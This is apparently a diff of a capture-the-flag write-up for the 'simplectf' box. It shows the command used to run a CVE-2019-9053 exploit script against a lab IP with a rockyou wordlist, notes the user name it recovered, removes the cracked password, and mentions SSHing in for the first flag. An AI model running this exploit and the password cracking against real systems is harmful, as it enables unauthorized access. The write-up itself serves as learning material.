FKouhai/simplectf/info.md

 _python2 cve-2019-9053.py -u http://10.10.237.53/simple/ -w rockyou.txt -c_

-And after some minutes it was done and found the user *mitch* and its password *secret*
+And after some minutes it was done and found the user *mitch* and its password

 Right after having this information we ssh'ed into the machine and got the first flag on the user's home directory